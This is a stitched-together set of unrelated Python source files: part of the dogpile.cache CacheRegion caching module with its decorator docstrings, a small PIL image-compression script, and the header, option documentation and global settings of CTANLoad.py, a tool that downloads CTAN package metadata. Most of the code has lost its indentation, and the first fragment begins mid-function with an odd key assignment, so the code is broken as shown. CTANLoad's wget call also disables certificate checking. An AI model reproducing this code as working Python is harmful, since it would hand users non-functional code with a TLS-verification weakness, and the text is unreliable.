mangled_keys = sorted_unique_keys
orig_to_mangled = dict(zip(sorted_unique_keys, mangled_keys))
values = dict(zip(mangled_keys, self.backend.get_multi(mangled_keys)))
for orig_key, mangled_key in orig_to_mangled.items():
with Lock(
self._mutex(mangled_key),
gen_value,
lambda: get_value(mangled_key),
expiration_time,
async_creator=lambda mutex: async_creator(orig_key, mutex),
):
pass
try:
if mutexes:
                # Sort the keys; the idea is to prevent deadlocks,
                # though a deadlock has not been reproduced in testing.
keys_to_get = sorted(mutexes)
new_values = creator(*keys_to_get)
values_w_created = dict(
(orig_to_mangled[k], self._value(v))
for k, v in zip(keys_to_get, new_values)
)
if not should_cache_fn:
self.backend.set_multi(values_w_created)
else:
values_to_cache = dict(
(k, v)
for k, v in values_w_created.items()
if should_cache_fn(v[0])
)
if values_to_cache:
self.backend.set_multi(values_to_cache)
values.update(values_w_created)
return [values[orig_to_mangled[k]].payload for k in keys]
finally:
for mutex in mutexes.values():
mutex.release()
def _value(self, value):
"""Return a :class:`.CachedValue` given a value."""
return CachedValue(value, {"ct": time.time(), "v": value_version})
def set(self, key, value):
"""Place a new value in the cache under the given key."""
if self.key_mangler:
key = self.key_mangler(key)
self.backend.set(key, self._value(value))
def set_multi(self, mapping):
"""Place new values in the cache under the given keys.
.. versionadded:: 0.5.0
"""
if not mapping:
return
if self.key_mangler:
mapping = dict(
(self.key_mangler(k), self._value(v))
for k, v in mapping.items()
)
else:
mapping = dict((k, self._value(v)) for k, v in mapping.items())
self.backend.set_multi(mapping)
def delete(self, key):
"""Remove a value from the cache.
This operation is idempotent (can be called multiple times, or on a
non-existent key, safely)
"""
if self.key_mangler:
key = self.key_mangler(key)
self.backend.delete(key)
def delete_multi(self, keys):
"""Remove multiple values from the cache.
This operation is idempotent (can be called multiple times, or on a
non-existent key, safely)
.. versionadded:: 0.5.0
"""
if self.key_mangler:
keys = list(map(lambda key: self.key_mangler(key), keys))
self.backend.delete_multi(keys)
def cache_on_arguments(
self,
namespace=None,
expiration_time=None,
should_cache_fn=None,
to_str=compat.string_type,
function_key_generator=None,
):
"""A function decorator that will cache the return
value of the function using a key derived from the
function itself and its arguments.
The decorator internally makes use of the
:meth:`.CacheRegion.get_or_create` method to access the
cache and conditionally call the function. See that
method for additional behavioral details.
E.g.::
@someregion.cache_on_arguments()
def generate_something(x, y):
return somedatabase.query(x, y)
The decorated function can then be called normally, where
data will be pulled from the cache region unless a new
value is needed::
result = generate_something(5, 6)
The function is also given an attribute ``invalidate()``, which
provides for invalidation of the value. Pass to ``invalidate()``
the same arguments you'd pass to the function itself to represent
a particular value::
generate_something.invalidate(5, 6)
Another attribute ``set()`` is added to provide extra caching
possibilities relative to the function. This is a convenience
method for :meth:`.CacheRegion.set` which will store a given
value directly without calling the decorated function.
The value to be cached is passed as the first argument, and the
arguments which would normally be passed to the function
should follow::
generate_something.set(3, 5, 6)
The above example is equivalent to calling
``generate_something(5, 6)``, if the function were to produce
the value ``3`` as the value to be cached.
.. versionadded:: 0.4.1 Added ``set()`` method to decorated function.
Similar to ``set()`` is ``refresh()``. This attribute will
invoke the decorated function and populate a new value into
the cache with the new value, as well as returning that value::
newvalue = generate_something.refresh(5, 6)
.. versionadded:: 0.5.0 Added ``refresh()`` method to decorated
function.
        ``original()``, on the other hand, will invoke the decorated function
without any caching::
newvalue = generate_something.original(5, 6)
.. versionadded:: 0.6.0 Added ``original()`` method to decorated
function.
Lastly, the ``get()`` method returns either the value cached
for the given key, or the token ``NO_VALUE`` if no such key
exists::
value = generate_something.get(5, 6)
.. versionadded:: 0.5.3 Added ``get()`` method to decorated
function.
The default key generation will use the name
of the function, the module name for the function,
the arguments passed, as well as an optional "namespace"
parameter in order to generate a cache key.
Given a function ``one`` inside the module
``myapp.tools``::
@region.cache_on_arguments(namespace="foo")
def one(a, b):
return a + b
Above, calling ``one(3, 4)`` will produce a
cache key as follows::
myapp.tools:one|foo|3 4
The key generator will ignore an initial argument
of ``self`` or ``cls``, making the decorator suitable
(with caveats) for use with instance or class methods.
Given the example::
class MyClass(object):
@region.cache_on_arguments(namespace="foo")
def one(self, a, b):
return a + b
The cache key above for ``MyClass().one(3, 4)`` will
again produce the same cache key of ``myapp.tools:one|foo|3 4`` -
the name ``self`` is skipped.
The ``namespace`` parameter is optional, and is used
normally to disambiguate two functions of the same
name within the same module, as can occur when decorating
instance or class methods as below::
class MyClass(object):
@region.cache_on_arguments(namespace='MC')
def somemethod(self, x, y):
""
class MyOtherClass(object):
@region.cache_on_arguments(namespace='MOC')
def somemethod(self, x, y):
""
Above, the ``namespace`` parameter disambiguates
between ``somemethod`` on ``MyClass`` and ``MyOtherClass``.
Python class declaration mechanics otherwise prevent
the decorator from having awareness of the ``MyClass``
and ``MyOtherClass`` names, as the function is received
by the decorator before it becomes an instance method.
The function key generation can be entirely replaced
on a per-region basis using the ``function_key_generator``
argument present on :func:`.make_region` and
        :class:`.CacheRegion`. It defaults to
:func:`.function_key_generator`.
:param namespace: optional string argument which will be
established as part of the cache key. This may be needed
to disambiguate functions of the same name within the same
source file, such as those
associated with classes - note that the decorator itself
can't see the parent class on a function as the class is
being declared.
:param expiration_time: if not None, will override the normal
expiration time.
May be specified as a callable, taking no arguments, that
returns a value to be used as the ``expiration_time``. This callable
will be called whenever the decorated function itself is called, in
caching or retrieving. Thus, this can be used to
determine a *dynamic* expiration time for the cached function
result. Example use cases include "cache the result until the
end of the day, week or time period" and "cache until a certain date
or time passes".
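
         For illustration (``seconds_until_midnight`` and ``build_report``
         are placeholders)::

            @region.cache_on_arguments(
                expiration_time=seconds_until_midnight
            )
            def generate_report(day):
                return build_report(day)
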
.. versionchanged:: 0.5.0
``expiration_time`` may be passed as a callable to
:meth:`.CacheRegion.cache_on_arguments`.
:param should_cache_fn: passed to :meth:`.CacheRegion.get_or_create`.
.. versionadded:: 0.4.3
:param to_str: callable, will be called on each function argument
in order to convert to a string. Defaults to ``str()``. If the
function accepts non-ascii unicode arguments on Python 2.x, the
``unicode()`` builtin can be substituted, but note this will
produce unicode cache keys which may require key mangling before
reaching the cache.
.. versionadded:: 0.5.0
:param function_key_generator: a function that will produce a
"cache key". This function will supersede the one configured on the
:class:`.CacheRegion` itself.
.. versionadded:: 0.5.5
.. seealso::
:meth:`.CacheRegion.cache_multi_on_arguments`
:meth:`.CacheRegion.get_or_create`
"""
expiration_time_is_callable = compat.callable(expiration_time)
if function_key_generator is None:
function_key_generator = self.function_key_generator
def get_or_create_for_user_func(key_generator, user_func, *arg, **kw):
key = key_generator(*arg, **kw)
timeout = (
expiration_time()
if expiration_time_is_callable
else expiration_time
)
return self.get_or_create(
key, user_func, timeout, should_cache_fn, (arg, kw)
)
def cache_decorator(user_func):
if to_str is compat.string_type:
# backwards compatible
key_generator = function_key_generator(namespace, user_func)
else:
key_generator = function_key_generator(
namespace, user_func, to_str=to_str
)
def refresh(*arg, **kw):
"""
Like invalidate, but regenerates the value instead
"""
key = key_generator(*arg, **kw)
value = user_func(*arg, **kw)
self.set(key, value)
return value
def invalidate(*arg, **kw):
key = key_generator(*arg, **kw)
self.delete(key)
def set_(value, *arg, **kw):
key = key_generator(*arg, **kw)
self.set(key, value)
def get(*arg, **kw):
key = key_generator(*arg, **kw)
return self.get(key)
user_func.set = set_
user_func.invalidate = invalidate
user_func.get = get
user_func.refresh = refresh
user_func.original = user_func
# Use `decorate` to preserve the signature of :param:`user_func`.
return decorate(
user_func, partial(get_or_create_for_user_func, key_generator)
)
return cache_decorator
def cache_multi_on_arguments(
self,
namespace=None,
expiration_time=None,
should_cache_fn=None,
asdict=False,
to_str=compat.string_type,
function_multi_key_generator=None,
):
"""A function decorator that will cache multiple return
values from the function using a sequence of keys derived from the
function itself and the arguments passed to it.
This method is the "multiple key" analogue to the
:meth:`.CacheRegion.cache_on_arguments` method.
Example::
@someregion.cache_multi_on_arguments()
def generate_something(*keys):
return [
somedatabase.query(key)
for key in keys
]
The decorated function can be called normally. The decorator
will produce a list of cache keys using a mechanism similar to
that of :meth:`.CacheRegion.cache_on_arguments`, combining the
name of the function with the optional namespace and with the
string form of each key. It will then consult the cache using
the same mechanism as that of :meth:`.CacheRegion.get_multi`
to retrieve all current values; the originally passed keys
corresponding to those values which aren't generated or need
regeneration will be assembled into a new argument list, and
the decorated function is then called with that subset of
arguments.
The returned result is a list::
result = generate_something("key1", "key2", "key3")
The decorator internally makes use of the
:meth:`.CacheRegion.get_or_create_multi` method to access the
cache and conditionally call the function. See that
method for additional behavioral details.
Unlike the :meth:`.CacheRegion.cache_on_arguments` method,
:meth:`.CacheRegion.cache_multi_on_arguments` works only with
a single function signature, one which takes a simple list of
keys as arguments.
Like :meth:`.CacheRegion.cache_on_arguments`, the decorated function
is also provided with a ``set()`` method, which here accepts a
mapping of keys and values to set in the cache::
generate_something.set({"k1": "value1",
"k2": "value2", "k3": "value3"})
...an ``invalidate()`` method, which has the effect of deleting
the given sequence of keys using the same mechanism as that of
:meth:`.CacheRegion.delete_multi`::
generate_something.invalidate("k1", "k2", "k3")
...a ``refresh()`` method, which will call the creation
function, cache the new values, and return them::
values = generate_something.refresh("k1", "k2", "k3")
...and a ``get()`` method, which will return values
based on the given arguments::
values = generate_something.get("k1", "k2", "k3")
.. versionadded:: 0.5.3 Added ``get()`` method to decorated
function.
Parameters passed to :meth:`.CacheRegion.cache_multi_on_arguments`
have the same meaning as those passed to
:meth:`.CacheRegion.cache_on_arguments`.
:param namespace: optional string argument which will be
established as part of each cache key.
:param expiration_time: if not None, will override the normal
expiration time. May be passed as an integer or a
callable.
:param should_cache_fn: passed to
:meth:`.CacheRegion.get_or_create_multi`. This function is given a
value as returned by the creator, and only if it returns True will
that value be placed in the cache.
:param asdict: if ``True``, the decorated function should return
its result as a dictionary of keys->values, and the final result
of calling the decorated function will also be a dictionary.
If left at its default value of ``False``, the decorated function
should return its result as a list of values, and the final
result of calling the decorated function will also be a list.
When ``asdict==True`` if the dictionary returned by the decorated
function is missing keys, those keys will not be cached.
:param to_str: callable, will be called on each function argument
in order to convert to a string. Defaults to ``str()``. If the
function accepts non-ascii unicode arguments on Python 2.x, the
``unicode()`` builtin can be substituted, but note this will
produce unicode cache keys which may require key mangling before
reaching the cache.
.. versionadded:: 0.5.0
:param function_multi_key_generator: a function that will produce a
list of keys. This function will supersede the one configured on the
:class:`.CacheRegion` itself.
.. versionadded:: 0.5.5
.. seealso::
:meth:`.CacheRegion.cache_on_arguments`
:meth:`.CacheRegion.get_or_create_multi`
"""
expiration_time_is_callable = compat.callable(expiration_time)
if function_multi_key_generator is None:
function_multi_key_generator = self.function_multi_key_generator
def get_or_create_for_user_func(key_generator, user_func, *arg, **kw):
cache_keys = arg
keys = key_generator(*arg, **kw)
key_lookup = dict(zip(keys, cache_keys))
@wraps(user_func)
def creator(*keys_to_create):
return user_func(*[key_lookup[k] for k in keys_to_create])
timeout = (
expiration_time()
if expiration_time_is_callable
else expiration_time
)
if asdict:
def dict_create(*keys):
d_values = creator(*keys)
return [
d_values.get(key_lookup[k], NO_VALUE) for k in keys
]
def wrap_cache_fn(value):
if value is NO_VALUE:
return False
elif not should_cache_fn:
return True
else:
return should_cache_fn(value)
result = self.get_or_create_multi(
keys, dict_create, timeout, wrap_cache_fn
)
result = dict(
(k, v)
for k, v in zip(cache_keys, result)
if v is not NO_VALUE
)
else:
result = self.get_or_create_multi(
keys, creator, timeout, should_cache_fn
)
return result
def cache_decorator(user_func):
key_generator = function_multi_key_generator(
namespace, user_func, to_str=to_str
)
def invalidate(*arg):
keys = key_generator(*arg)
self.delete_multi(keys)
def set_(mapping):
keys = list(mapping)
gen_keys = key_generator(*keys)
self.set_multi(
dict(
(gen_key, mapping[key])
for gen_key, key in zip(gen_keys, keys)
)
)
def get(*arg):
keys = key_generator(*arg)
return self.get_multi(keys)
def refresh(*arg):
keys = key_generator(*arg)
values = user_func(*arg)
if asdict:
self.set_multi(dict(zip(keys, [values[a] for a in arg])))
return values
else:
self.set_multi(dict(zip(keys, values)))
return values
user_func.set = set_
user_func.invalidate = invalidate
user_func.refresh = refresh
user_func.get = get
# Use `decorate` to preserve the signature of :param:`user_func`.
return decorate(
user_func, partial(get_or_create_for_user_func, key_generator)
)
return cache_decorator
def make_region(*arg, **kw):
"""Instantiate a new :class:`.CacheRegion`.
Currently, :func:`.make_region` is a passthrough
to :class:`.CacheRegion`. See that class for
constructor arguments.
"""
return CacheRegion(*arg, **kw)
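# ----------------------------------------------------------------------
# Minimal usage sketch for cache_multi_on_arguments (illustrative only,
# assuming the standard "dogpile.cache.memory" backend; the function and
# key names below are made up for demonstration).
def _example_multi_usage():
    region = make_region().configure("dogpile.cache.memory")

    @region.cache_multi_on_arguments(namespace="demo")
    def generate_something(*keys):
        # called only with the keys that are missing from or expired in the cache
        return ["value for %s" % key for key in keys]

    values = generate_something("k1", "k2", "k3")       # list of three values
    generate_something.set({"k1": "one", "k2": "two"})  # prime the cache directly
    generate_something.invalidate("k1", "k2", "k3")     # drop the cached entries
    return values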
|
compress_images.py
|
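# Resize the frames listed in the CSV below to 640x480, store optimized copies
# under images/<year>/<month>/<day>/ (the date is taken from the "autosave" file
# name), and process the files in small batches of worker threads.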
import re
from PIL import Image
import pandas as pd
import os
import threading
from_dir = '/media/tsamsiyu/985A6DDF5A6DBAA0/Users/Dmitry/Downloads/full-frames.tar/full-frames/rtsd-frames'
to_base_dir = 'images'
meta_csv_path = 'materials/full-gt.csv'
img_name_regex = re.compile(r'^autosave(\d\d)_(\d\d)_(\d\d\d\d)_(.+\..+)$') # raw string avoids invalid-escape warnings
use_threads = 3
def compress(from_file_path, to_file_path):
img = Image.open(from_file_path)
img = img.resize((640, 480), Image.ANTIALIAS) # resize() returns a new image; keep the result
img.save(to_file_path, optimize=True)
def detect_file_locations(filename):
(day, month, year, new_file_name) = img_name_regex.match(filename).groups()
to_file_dir = to_base_dir + '/' + year + '/' + month + '/' + day
to_file_path = to_file_dir + '/' + new_file_name
if os.path.exists(to_file_path):
return None
if not os.path.isdir(to_file_dir):
os.makedirs(to_file_dir)
from_file_path = from_dir + '/' + filename
return from_file_path, to_file_path
def run_threads(threads):
for thread in threads:
thread.start()
for thread in threads:
thread.join()
def main():
examples = pd.read_csv(meta_csv_path)
charged_threads = []
handled = {}
for key, row in examples.iterrows():
if row['filename'] in handled:
continue
handled[row['filename']] = True
file_locations = detect_file_locations(row['filename'])
if file_locations is not None:
t = threading.Thread(target=compress, args=file_locations)
charged_threads.append(t)
if len(charged_threads) == use_threads:
run_threads(charged_threads)
charged_threads.clear()
if charged_threads: # after the loop: run the last, smaller batch as well
run_threads(charged_threads)
main()
|
CTANLoad.py
|
#!/usr/bin/python3.8
# -*- coding: utf-8 -*-
# please adjust these two lines if necessary
# CTANLoad.py
# (C) Günter Partosch, 2019/2021
# Still to be done / known problems:
# - different directories for XML and PDF files? (-)
# - replace GNU wget by a Python construct; https://pypi.org/project/python3-wget/ (does not really work) (-)
# - selection by author, too? CTAN.lap or authorpackages; for f in authorpackages: print(authors[f][1], authorpackages[f]) (x)
# - error with -r; CTAN.pkl is rebuilt every time (?)
# - some error: crimsonpro is missing in c:\users\guent\documents\python\ctan
# ------------------------------------------------------------------
# History
#
# 2.0.0 2019-10-01 completely revised
# 2.0.1 2019-10-03 smaller changes: messages + command parsing
# 2.0.2 2019-10-04 smaller changes: messages
# 2.0.3 2019-11-26 smaller change: error message and parameter -n
# 2.0.4 2020-01-09 -c enhanced
# 2.0.5 2020-01-12 some corrections
# 2.0.6 2020-01-15 time measure
# 2.0.7 2020-01-24 statistics improved
# 2.0.8 2020-01-25 minor corrections
# 2.0.9 2020-06-05 correction in load_documentation_file
# 2.0.10 2020-06-26 enhance verbose output
# 2.0.11 2020-07-22 first lines of file
# 2.0.12 2021-04-05 output for option -c enhanced
# 2.0.13 2021-05-13 output local file name for downloaded PDF files in verbose mode
# 2.0.14 2021-05-13 output the call parameters in more details in verbose mode
# 2.0.15 2021-05-14 clean-up for variables
# 2.0.16 2021-05-20 OS directory + separator improved
# 2.0.17 2021-05-21 more details in verbose mode
# 2.0.18 2021-05-23 OS directory name improved
# 2.0.19 2021-05-24 OS directory handling improved (existence, installation)
# 2.1.0 2021-05-26 load licences, make corr. directory and file; expand CTAN.pkl
# 2.1.1 2021-05-26 correction for not-existing keys in licenses.xml
# 2.1.2 2021-06-07 smaller improvements in check_integrity
# 2.2.0 2021-06-08 new approach in check_integrity
# 2.3.0 2021-06-09 some function calls as threads
# 2.3.1 2021-06-12 auxiliary function fold: shorten long option values for output
# 2.3.2 2021-06-14 messages classified: Warnings, Error, Info
# 2.3.3 2021-06-14 str.format(...) used (if applicable); ellipses used to shorten some texts
# 2.3.4 2021-06-15 main function new structured
# 2.3.5 2021-06-18 output (options in program call) enhanced
# 2.3.6 2021-06-18 new function verify_PDF_files: check actualized PDF_toc; delete a PDF file if necessary
# 2.3.7 2021-06-19 main function more modularized; new functions call_plain, call_load, call_check
# 2.3.8 2021-06-22 error corrections and improvements for the handling of PDF_toc and XML_toc
# 2.4.0 2021-06-23 regeneration of pickle file enabled: new option -r; new functions regenerate_pickle_files and get_XML_files
# 2.4.1 2021-06-24 error handling in the check_integrity context changed
# 2.4.2 2021-06-26 handling of -r changed
# 2.5.0 2021-06-30 add. option -k; add. function get_CTAN_lpt (needs CTAN.lpt)
# 2.5.1 2021-07-01 minor corrections
# 2.5.2 2021-07-05 function fold restructured
# 2.5.3 2021-07-06 pickle file 1 is generated, too
# 2.6.0 2021-07-11 search of packages with author name template; new option -A; new function get_CTAN_lap (needs CTAN.lap)
# 2.6.1 2021-07-12 some corrections in the handling of -t / -k and -A
# 2.6.2 2021-07-15 more corrections in the handling of -t / -k and -A
# 2.7.0 2021-07-26 combined filtering new organized; new function get_package_set; 2 additional warning messages
# ------------------------------------------------------------------
# Usage (CTANLoad)
#
# usage: CTANLoad.py [-h] [-a] [-A AUTHOR_TEMPLATE] [-c] [-d DIREC] [-f] [-l]
# [-k KEY_TEMPLATE] [-n NUMBER] [-o OUTPUT_NAME] [-r]
# [-t TEMPLATE] [-stat] [-v] [-V]
#
# Load XML and PDF documentation files from CTAN a/o generate some special
# lists, and prepare data for CTANOut [CTANLoad.py; Version: 2.7.0 (2021-07-26)]
#
# Optional parameters:
# -h, --help show this help message and exit
# -a, --author Author of the program
# -A AUTHOR_TEMPLATE, --author_template AUTHOR_TEMPLATE
# Name template for authors - Default:
# -c, --check_integrity
# Flag: Check the integrity of the 2nd .pkl file. -
# Default: False
# -d DIREC, --directory DIREC
# OS Directory for output files - Default: .\
# -f, --download_files Flag: Download associated documentation files [PDF]. -
# Default: False
# -l, --lists Flag: Generate some special lists and prepare files
# for CTANOut. - Default: False
# -k KEY_TEMPLATE, --key_template KEY_TEMPLATE
# Key template for package XML files to be loaded -
# Default:
# -n NUMBER, --number NUMBER
# Maximum number of file downloads - Default: 250
# -o OUTPUT_NAME, --output OUTPUT_NAME
# Generic file name for output files - Default: all
# -r, --regenerate_pickle_files
# Flag: Regenerate the two pickle files. - Default:
# False
# -t TEMPLATE, --template TEMPLATE
# Name template for package XML files to be loaded -
# Default:
# -stat, --statistics Flag: Print statistics. - Default: False
# -v, --verbose Flag: Output is verbose. - Default: False
# -V, --version Version of the program
#
# ------------------------------------------------------------------
# Messages (CTANLoad)
#
# Informative messages:
# - Info: PDF documentation file '<PDF file>' downloaded
# - Info: Regeneration of '<pickle file>'
# - Info: Successfully created the OS directory '<directory>'
# - Info: XML file '<XML file>' downloaded ('<local file>.xml' on PC)
# - Info: XML file for package '<package name>' downloaded ('<local file>.xml' on PC)
# - Info: authors collected
# - Info: entry '<entry>' in OS directory deleted
# - Info: file '<file name>' (list of authors and associated packages) generated
# - Info: file '<file name>' (list of authors) generated
# - Info: file '<file name>' (list of licenses) generated
# - Info: file '<file name>' (list of packages) generated
# - Info: file '<file name>' (list of topics and associated packages) generated
# - Info: file '<file name>' (list of topics) generated
# - Info: integrity check
# - Info: licenses collected
# - Info: local XML file '<XML file>'
# - Info: no error with integrity check
# - Info: packages collected
# - Info: packagetopics, topicspackage, authorpackage collected
# - Info: pickle file '<pickle file name>' written
# - Info: program successfully completed
# - Info: topics collected
# - Info: unique local file name: '<local file name>'
#
# Warnings:
# - Warning: Creation of the OS directory '<directory>' failed
# - Warning: PDF documentation file '<PDF file>' not downloaded
# - Warning: PDF file '<PDF file>' in OS deleted
# - Warning: PDF file '<PDF file>' without associated XML file
# - Warning: XML file '<XML file>' empty or not well-formed
# - Warning: XML file '<XML file>' in OS deleted
# - Warning: XML file for package '<package name>' not downloaded
# - Warning: entry '<entry>' in dictionary, but OS file is empty
# - Warning: entry '<entry>' in dictionary, but OS file not found
# - Warning: local XML file for package '<package name>' empty or not well-formed
# - Warning: local XML file for package '<package name>' not found
# - Warning: maximum number (<number>) of downloaded XML+PDF files exceeded
# - Warning: no correct XML file for any specified package found
# - Warning: no package found which matched the specified <kind of template> template '<template>'
# - Warning: pickle file '<pickle file name>' cannot be loaded a/o written
# - Warning: '<option>' reset to <new value> (due to <reason>)
#
# Errors:
# - Error: program terminated
# - Error: standard XML file 'file' empty or not well-formed
# - Error: standard XML file '<XML file>' not downloaded
# - Error: tried to use the program indirectly
# - Error: local file '<file>' not loaded
# ------------------------------------------------------------------
# Functions in CTANLoad.py
#
# analyze_XML_file(file) Analyze an XML package file for documentation (PDF) files.
# call_check() Process all necessary steps for an integrity check.
# call_load() Process all steps for a complete ctanout call (without integrity check).
# call_plain() Process all steps for a plain call.
# check_integrity() Check integrity.
# fold() auxiliary function
# generate_lists() Generate xyz.loa (list of authors), xyz.lop (list of packages), xyz.lok (list of topics), xyz.lol (list of licenses),
# xyz.lpt (list of topics and associated packages), xyz.lap (list of authors and associated packages); xyz is the specified generic output file name.
# generate_pickle1() pickle dump: actual authors, packages, licenses, topics, topicspackage, packagetopics, authorpackages
# generate_pickle2() pickle dump: actual XML_toc (list with download information files).
# generate_topicspackage() Generate topicspackage, packagetopics, and authorpackages.
# get_CTAN_lpt() Load CTAN.lpt and analyze; get cross-reference of topics and packages
# get_CTAN_lap() Load CTAN.lap and analyze; get cross-reference of authors and packages
# get_package_set() Analyze dictionary 'packages' for name templates
# get_PDF_files(d) List all PDF files in an OS directory.
# get_XML_files(d) List all XML files in the OS directory d.
# dload_XML_files() Download XML package files.
# load_XML_toc() Load pickle file 2 (with XML_toc).
# dload_authors() Download XML file 'authors'.
# dload_document_file(...) Download one information file (PDF).
# dload_licenses() Download XML file 'licenses'.
# dload_packages() Download XML file 'packages'.
# dload_topics() Download XML file 'topics'.
# main() Main function
# make_statistics() Print statistics on terminal.
# regenerate_pickle_files() Regenerate corrupted pickle files.
# set_PDF_toc() Fill PDF_toc on the basis of XML_Toc.
# ------------------------------------------------------------------
# Examples (CTANLoad)
# CTANLoad -h
# - help, show the options
#
# CTANLoad
# - download authors, topics, packages, licenses; write CTAN.pkl
# - not verbose and without statistics
#
# CTANLoad -v -stat
# - as above
# - verbose [-v]
# - with statistics [-stat]
#
# CTANLoad -t "^a.+$" -v
# - load all CTAN XML files with name template "^a.+$" [-t]
# - verbose output [-v]
#
# CTANLoad -f -n 300 -t "^l3" -v
# - verbose output [-v]
# - load all CTAN XML files with the name template "^l3$" [-t]
# - load the associated information files (PDF) [-f]
# - maximum number of download files [-n]
#
# CTANLoad -v -l
# - generate some special lists, and prepare files for CTANOut [-l]
# - verbose output [-v]
#
# CTANLoad -v -l -c -stat
# - generate some special lists, and prepare files for CTANOut [-l]
# - verbose output [-v]
# - with integrity check [-c]
# - with statistics [-stat]
#
# CTANLoad -v -stat -r
# - Regenerate the two pickle files [-r]
# - verbose [-v]
# - with statistics [-stat]
#
# CTANLoad -k latex -f -v -stat
# - download all CTAN packages which match the topic "latex" [-k]
# - load the associated information files (PDF) [-f]
# - verbose [-v]
# - with statistics [-stat]
#
# CTANLoad -k chinese -t "^zh" -f -v -stat
# - download all CTAN packages which match the topic "chinese" [-k]
# - download only CTAN XML files with the name template "^zh" [-t]
# - load the associated information files (PDF) [-f]
# - verbose [-v]
# - with statistics [-stat]
#
# CTANLoad -A Knuth -v -stat
# - download all XML packages with the author template "Knuth" [-A]
# - verbose [-v]
# - with statistics [-stat]
#
# CTANLoad -A Knuth -k collection -stat
# - download all XML packages with the author template "Knuth" [-A]
# - download only packages with the topic template "collection"[-k]
# - with statistics [-stat]
#
# CTANLoad -A Knuth -k collection -f -v -stat -t knuth
# - download all XML packages with the author template "Knuth" [-A]
# - download only packages with the topic template "collection"[-k]
# - download only packages with the name template "knuth" [-t]
# - verbose [-v]
# - with statistics [-stat]
# Regular expressions
# -------------------
# The options -t (a/o -to and -tl) and -k (a/o -ko and -kl) need regular expressions as values.
# such as
#
# -k latex matches all topic names which begin with "latex"
# -t "latex|ltx|l3|lt3" matches all file names which begin with "latex", "ltx", "l3", or "lt3"
# -t "^.+$" matches all file names
# -t "^[a-b]" matches all file names which begin with the letter a or b
# ==================================================================
# Imports
import argparse # parse arguments
import os # delete a file on disk, for instance
from os import path # path informations
import pickle # read/write pickle data
import platform # get OS informations
import random # used for random integers
import re # handle regular expressions
import subprocess # handling of sub-processes
import sys # system calls
import time # used for random seed, time measurement
import xml.etree.ElementTree as ET # XML processing
from threading import Thread # handling of threads
# ==================================================================
# Global settings
# ------------------------------------------------------------------
# The program
prg_name = "CTANLoad.py"
prg_author = "Günter Partosch"
prg_email = "Guenter.Partosch@hrz.uni-giessen.de"
prg_version = "2.7.0"
prg_date = "2021-07-26"
prg_inst = "Justus-Liebig-Universität Gießen, Hochschulrechenzentrum"
operatingsys = platform.system()
call = sys.argv
# ------------------------------------------------------------------
# Texts for argparse and help
author_text = "Author of the program"
author_template_text = "Name template for authors"
version_text = "Version of the program"
template_text = "Name template for package XML files to be loaded"
key_template_text = "Key template for package XML files to be loaded"
output_text = "Generic file name for output files"
number_text = "Maximum number of file downloads"
direc_text = "OS Directory for output files"
program_text = "Load XML and PDF documentation files from CTAN a/o generate some special lists, and prepare data for CTANOut"
verbose_text = "Flag: Output is verbose."
download_text = "Flag: Download associated documentation files [PDF]."
lists_text = "Flag: Generate some special lists and prepare files for CTANOut."
statistics_text = "Flag: Print statistics."
integrity_text = "Flag: Check the integrity of the 2nd .pkl file."
regenerate_text = "Flag: Regenerate the two pickle files."
# -----------------------------------------------------------------
# Defaults/variables for argparse
download_default = False # default for option -f (no PDF download)
integrity_default = False # default for option -c (no integrity check)
lists_default = False # default for option -l (special lists are not generated)
number_default = 250 # default for option -n (maximum number of files to be loaded)
output_name_default = "all" # default for option -o (generic file name)
statistics_default = False # default for option -stat (no statistics output)
template_default = "" # default for option -t (name template for file loading)
author_template_default = "" # default for option -A (author name template)
key_template_default = "" # default for option -k (key template for file loading)
verbose_default = False # default for option -v (output is not verbose)
regenerate_default = False # default for option -r (no regeneration)
act_direc = "."
if operatingsys == "Windows":
direc_sep = "\\"
else:
direc_sep = "/"
direc_default = act_direc + direc_sep # default for -d (output OS directory)
download = None # option -f (no PDF download)
integrity = None # option -c (no integrity check)
lists = None # option -l (special lists are not generated)
number = 0 # option -n (maximum number of files to be loaded)
output_name = "" # option -o (generic file name)
statistics = None # option -stat (no statistics output)
template = "" # option -t (name template for file loading)
author_template = "" # option -A (author name template)
key_template = "" # option -k (key template)
verbose = None # option -v (output is not verbose)
# ------------------------------------------------------------------
# Dictionaries
authorpackages = {} # python dictionary: list of authors and their packages
authors = {} # python dictionary: list of authors
packages = {} # python dictionary: list of packages
licenses = {} # python dictionary: list of licenses
packagetopics = {} # python dictionary: list of packages and their topics
topics = {} # python dictionary: list of topics
topicspackage = {} # python dictionary: list of topics and their packages
XML_toc = {} # python dictionary: list of PDF files: XML_toc[href]=...PDF file
PDF_toc = {} # python dictionary: list of PDF files: PDF_toc[lfn]=...package file
all_XML_files = () # list with all XML files
selected_packages_lpt = set() # python set: packages with selected topics
selected_packages_lap = set() # python set: packages with selected authors
# XML_toc
# Structure: XML_toc[href] = (XML file, key, onename)
# generated and changed in: analyze_XML_file(file), check_integrity()
# inspected in: analyze_XML_file(file), check_integrity()
# stored in pickle file: generate_pickle2()
# loaded from pickle file: load_XML_toc()
#
# PDF_toc
# Structure: PDF_toc[fkey + "-" + onename] = file
# generated in: get_PDF_files(d)
# changed in analyze_XML_file(file), check_integrity()
# inspected in: check_integrity()
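#
# Example entries (illustrative values only):
# XML_toc["ctan:/macros/latex/contrib/foo/doc/foo.pdf"] = ("foo.xml", "1234567890", "foo.pdf")
# PDF_toc["1234567890-foo.pdf"] = "foo.xml"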
# 1st pickle file:
# name: CTAN.pkl
# contains: authors, packages, topics, licenses, topicspackage, packagetopics, authorpackages
#
# 2nd pickle file:
# name: CTAN2.pkl
# contains: XML_toc
# ------------------------------------------------------------------
# Settings for wget (authors, packages, topics)
ctanUrl = "https://ctan.org" # head of a CTAN url
ctanUrl2 = ctanUrl + "/tex-archive" # head of another CTAN url
call1 = "wget https://ctan.org/xml/2.0/" # base wget call for authors, packages, ...
call2 = "wget https://ctan.org/xml/2.0/pkg/" # base wget call for package files
parameter = "?no-dtd=true --no-check-certificate -O " # additional parameter for wget
# ------------------------------------------------------------------
# other settings
pkl_file = "CTAN.pkl" # name of 1st pickle file
pkl_file2 = "CTAN2.pkl"# name of 2nd pickle file
counter = 0 # counter for downloaded XML files (in the actual session)
pdfcounter = 0 # counter for downloaded PDF files (in the actual session)
pdfctrerr = 0 # counter for not downloaded PDF files (in the actual session)
corrected = 0 # counter of corrected entries in XML_toc (in the actual session)
ext = ".xml" # file name extension for downloaded XML files
rndg = 2 # optional rounding of float numbers
left = 35 # width of labels in statistics
ellipse = " ..." # abbreviate texts
ok = None
reset_text = "Info: '{0}' reset to {1} (due to {2})"
